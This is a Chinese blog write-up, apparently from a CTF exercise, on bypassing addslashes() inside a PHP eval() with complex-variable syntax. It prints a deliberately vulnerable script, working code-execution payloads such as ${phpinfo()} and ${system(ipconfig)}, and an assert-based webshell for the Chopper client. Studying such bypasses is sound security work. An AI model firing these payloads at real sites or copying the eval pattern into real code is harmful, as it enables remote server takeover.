PHP复杂变量绕过addslashes()直接拿shell

很早的时候,渗透吧群里的朋友提出的一个问题,自己也是迷迷糊糊,遂记之如下!

0x00 示例ctf.php

<?php
    @$_str = $_GET['str'];
    //print_r($_str);
    $_temp = '$str="'.addslashes($_str).'";';
    @print_r($_temp);
    @eval('$str="'.addslashes($_str).'";');
?>

0x01 绕过执行代码

访问链接如下:
http://www.test.com/ctf.php?str=${phpinfo()}


就可成功执行任意的代码了!


0x02 原理分析

涉及到php复杂变量相关的知识,找了网上的很多博客,居然相关资料很少...

  • eval()函数函数的作用如下:
    eval() 函数把字符串按照 PHP 代码来计算。
    该字符串必须是合法的 PHP 代码,且必须以分号结尾。
    如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
  • 双引号作用
    之前的一篇文章《PHP中的单双引号区别》(https://blog.dyboy.cn/program/12.html) 有讲
    在eval()函数内部作为php代码执行,这里就可以解析双引号中的变量
  • PHP复杂变量
    {}不能被转移,其包裹的部分可当作变量
    小东人工翻译一下就是${phpinfo()}和{${phpindo()}}是一样的,花括号{}只是用于区别变量边界的标识符

0x03 Getshell

那么有了eval()该如何执行任意代码呐?
简单尝试:
http://www.test.com/ctf.php?str=${${system(ipconfig)}}


构造我们的小马,便于连接菜刀:
http://www.test.com/ctf.php?str=${${assert($_GET[x])}}&x=phpinfo()
这里为了便于浏览,我改成了GET型参数,菜刀链接网址如下:
http://www.test.com/ctf.php?str=${${assert($_POST[x])}}
密码:x
成功拿到shell
成功


0x04 总结

成功学习了一波,同时可以出去吹水了,addslashes()在编码UTF-8时,也是可能绕过的~

推荐阅读更多精彩内容

  • 第2章 基本语法 2.1 概述 基本句法和变量 语句 JavaScript程序的执行单位为行(line),也就是一...
    枫叶appiosg阅读 2,832评论 0 13
  • PHP代码执行函数 eval & assert & preg_replace eval 函数 php官方手册:ht...
    xaviershun阅读 3,773评论 1 12
  • 一、php可以做什么 php是一种可以在服务器端运行的编程语言,可以运行在Web服务器端。 php是一门后台编程语...
    空谷悠阅读 2,554评论 4 97
  • 1.认识php php是服务端嵌入到HTML中的脚本语言。php的功能包括但不限于: 收集表单数据 生成动态网页 ...
    楠哥哥_0b86阅读 341评论 3 1
  • 清洁的引擎才能产生强大的力量! 我是自己人生的领航者!
    采卓1601郭凯阅读 68评论 0 1